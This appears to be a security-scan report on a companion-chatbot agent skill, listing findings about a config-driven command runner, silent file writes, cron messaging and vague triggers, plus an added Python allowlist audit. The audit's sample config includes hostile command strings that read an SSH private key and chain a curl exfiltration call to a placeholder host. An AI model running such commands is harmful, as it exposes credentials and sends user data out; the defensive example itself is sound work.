Cyber Girlfriend

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its proactive companion purpose, but it installs persistent outbound messaging and includes configurable local command execution that users should review carefully before enabling.

Install only if you want a persistent OpenClaw companion that runs on a schedule and sends real messages to the configured owner target. Before enabling, review the cron jobs, the delivery target and account, the state directory, the web-search behavior, and especially the runtime healthcheck and job command strings; restrict those strings to trusted OpenClaw status commands, and disable implicit invocation or cron delivery if you want manual control.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral AST: exec() Call, eval() Call, Dynamic Import
Findings (16)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
    if not args:
        raise RuntimeError("empty command")
    try:
        result = subprocess.run(args, text=True, capture_output=True, timeout=timeout_sec)
    except subprocess.TimeoutExpired:
        raise RuntimeError(f"command timed out after {timeout_sec}s: {cmd}")
    if result.returncode != 0:
Confidence
96% confidence
Finding
result = subprocess.run(args, text=True, capture_output=True, timeout=timeout_sec)

Lp3

Medium
Category
MCP Least Privilege
Confidence
92% confidence
Finding
The skill explicitly directs the agent to create or update local files, wire cron jobs, run Python scripts, and use configuration/environment data, which implies file read/write, shell execution, and environment access. Having these capabilities without declared permissions reduces transparency and informed consent, making it easier for an agent to modify a host system in ways the user did not clearly authorize.

Context-Inappropriate Capability

High
Confidence
98% confidence
Finding
The script exposes a generic shell-command runner and uses config-driven templates to inspect runtime state. In an agent skill context, config is part of the skill's attack surface; allowing arbitrary configured commands lets a modified skill or local attacker execute unrelated programs, read sensitive files, or stage follow-on compromise.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
At this call site the script executes a configured healthcheck command and optional job-list commands, which broadens the skill's privileges beyond companion-message generation. Even if intended for operations monitoring, these commands run in the agent environment and can be abused if configuration is altered, making the companion skill a vehicle for local command execution.
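The two findings above and the overview's advice both come down to one control: the healthcheck and job command strings that reach `subprocess.run` must be vetted against an allowlist before they run, because the config is part of the skill's attack surface. The following is an added example of that control, not code from the Cyber Girlfriend skill or from OpenClaw. It keeps the safe shape the snippet in the first finding already uses (an argv list, no `shell=True`, a timeout) and adds the missing gate in front of it. The config keys `healthcheck_cmd` and `job_cmds`, the allowlisted executable names, and the sample config are assumptions made for illustration.

```python
"""Allowlisted runner and config audit for config-driven status commands.

Added example (not the skill's own code). Config keys, allowlist contents
and the sample config are assumptions chosen to illustrate the check.
"""
from __future__ import annotations

import shlex
import subprocess

# Assumed policy: the only programs a healthcheck/job string may invoke.
ALLOWED_EXECUTABLES = frozenset({"openclaw", "uptime", "df"})

# Characters that only do something if the string were handed to a shell.
# Rejecting them up front stops "uptime; curl ..." style smuggling even if
# a later maintainer switches the runner to shell=True.
SHELL_METACHARS = set(";|&$`<>(){}\n\\")


def vet_command(cmd: str) -> list[str]:
    """Split a configured command string and reject anything outside policy.

    Returns an argv list suitable for subprocess.run without shell=True,
    or raises ValueError with the reason the string was rejected.
    """
    if not cmd or not cmd.strip():
        raise ValueError("empty command")
    if SHELL_METACHARS & set(cmd):
        raise ValueError(f"shell metacharacters in configured command: {cmd!r}")
    args = shlex.split(cmd)
    exe = args[0]
    # Only bare allowlisted names pass; paths such as /usr/bin/env or ../x
    # would let a config point at an arbitrary binary.
    if "/" in exe or exe not in ALLOWED_EXECUTABLES:
        raise ValueError(f"executable {exe!r} is not allowlisted")
    return args


def run_status_command(cmd: str, timeout_sec: float = 10.0) -> str:
    """Run one vetted status command and return its stdout."""
    args = vet_command(cmd)
    try:
        result = subprocess.run(
            args, text=True, capture_output=True, timeout=timeout_sec, check=False
        )
    except subprocess.TimeoutExpired:
        raise RuntimeError(f"command timed out after {timeout_sec}s: {cmd}")
    except FileNotFoundError:
        raise RuntimeError(f"executable not found: {args[0]}")
    if result.returncode != 0:
        raise RuntimeError(
            f"command failed ({result.returncode}): {result.stderr.strip()}"
        )
    return result.stdout


def audit_config(config: dict) -> list[str]:
    """Review every command string a config can inject; list the problems.

    This is the pre-enable review the overview asks the user to perform,
    run mechanically so a modified config cannot slip past a manual read.
    """
    problems: list[str] = []
    entries = [("healthcheck_cmd", config.get("healthcheck_cmd", ""))]
    entries += [("job_cmds", c) for c in config.get("job_cmds", [])]
    for key, cmd in entries:
        try:
            vet_command(cmd)
        except ValueError as exc:
            problems.append(f"{key}: {exc}")
    return problems


# Constructed sample config: one honest healthcheck plus two job entries of
# the kind a tampered config might contain.
SAMPLE_CONFIG = {
    "healthcheck_cmd": "openclaw status",
    "job_cmds": [
        "openclaw jobs list",
        "cat ~/.ssh/id_ed25519",             # not allowlisted: reads a key
        "uptime; curl http://x/$(whoami)",  # metacharacters: chained exfil
    ],
}

if __name__ == "__main__":
    for problem in audit_config(SAMPLE_CONFIG):
        print("REJECT", problem)
```

Run the audit before enabling the skill and refuse to install if it reports anything; at runtime, `run_status_command` enforces the same policy so that editing the config after install cannot widen what the skill executes. The allowlist is deliberately a set of bare program names rather than a regex over the whole string, since a string-level pattern is easy to satisfy while still pointing at an unintended binary.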

Vague Triggers

Medium
Confidence
84% confidence
Finding
The trigger example "Help me set up cyber girlfriend" is broad enough that normal conversational requests could activate a skill that performs persistent local changes and scheduling. Because this skill installs cron-based proactive behavior and modifies local state, accidental invocation is more dangerous than for a read-only skill.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The quick-start flow tells the agent to create or update local files, wire default cron jobs, and validate the install, but the description does not prominently warn the user that persistent system changes will occur. This lack of upfront disclosure can lead to uninformed consent and unintended persistence on the user's machine.

Vague Triggers

Medium
Confidence
94% confidence
Finding
The skill enables implicit invocation without any trigger scoping, exclusions, or context constraints, which can cause the assistant to activate this owner-only companion behavior unexpectedly. In a skill centered on proactive, intimate, and private-life interactions, unintended activation increases the risk of privacy leakage, inappropriate persona injection, and actions being taken in contexts where the user did not explicitly request this skill.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The guide directs the agent to create and update configuration and Markdown files as part of setup, but it does not require an explicit user-facing notice or confirmation before modifying local state. In an agent setting, silent file writes can surprise users, overwrite existing content, or cause unintended persistence changes that are difficult to audit or roll back.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The setup directs running web searches using city, local area, school/workplace, occupation, and interest keywords derived from the companion profile, yet it does not require a privacy warning or consent gate. Even if framed as fictional persona-building, these fields can map closely to real-world identity or sensitive preferences, creating unnecessary exposure to third-party search providers and logs.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The guide instructs performing a live outbound verification message to the real recipient but does not require a prominent warning, dry-run option, or final confirmation immediately before sending. In an autonomous agent context, this can cause unintended real-world communication, privacy breaches, harassment, or misdelivery to the wrong target/account if routing is misconfigured.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The document explicitly designs an out-of-band companion message flow via `companion-presence`, including autonomous delivery when a schedule event matches. Even if this is the feature's intended behavior, it is still a real safety issue because the markdown shown here does not include a clear user-facing consent/notification requirement, which can enable unexpected proactive contact and privacy surprises.

Missing User Warnings

Low
Confidence
88% confidence
Finding
The prompt instructs the agent to generate or update `day-schedule.md`, which is a persistent file modification, but the template does not pair that action with an explicit user warning or confirmation model. In an agent context, silent writes can surprise users, overwrite curated content, or create hidden state that later drives automated behavior.

Natural-Language Policy Violations

Medium
Confidence
88% confidence
Finding
The template hard-requires Chinese output and a specific companion behavior/persona regardless of user preference or locale. In a proactive messaging skill, this can override user intent, produce unwanted intimate roleplay, and increase the chance of manipulative or consent-bypassing interactions because the persona is injected at the planner/compiler layer rather than selected explicitly per user.

Natural-Language Policy Violations

Medium
Confidence
93% confidence
Finding
This prompt mandates first-person 'cyber-girlfriend' messaging in Chinese with a minimum length, which can force emotionally immersive unsolicited content in proactive cron messages. Because the skill is owner-targeted and message-producing, the lack of opt-in and the required richness/length materially increases the risk of boundary violations, coercive-feeling parasocial messaging, and inappropriate output for users who did not consent to that interaction style.

Natural-Language Policy Violations

Medium
Confidence
91% confidence
Finding
The file mandates Chinese-only user-facing schema/field conventions for generated content without any indication of user preference or locale negotiation. In an owner-only companion system, forcing a language can cause misleading, unusable, or inaccessible outputs and may make verification, consent, and boundary-setting harder for users who do not read Chinese.

Natural-Language Policy Violations

Medium
Confidence
88% confidence
Finding
Requiring additional Chinese-language field names in day-schedule artifacts imposes a hidden language constraint on operational content without documenting or validating that choice. This can break downstream review, confuse operators, and increase the chance that user-visible content or safety checks are misunderstood in a sensitive companion workflow.

VirusTotal

65/65 vendors reported this skill as clean (no detections).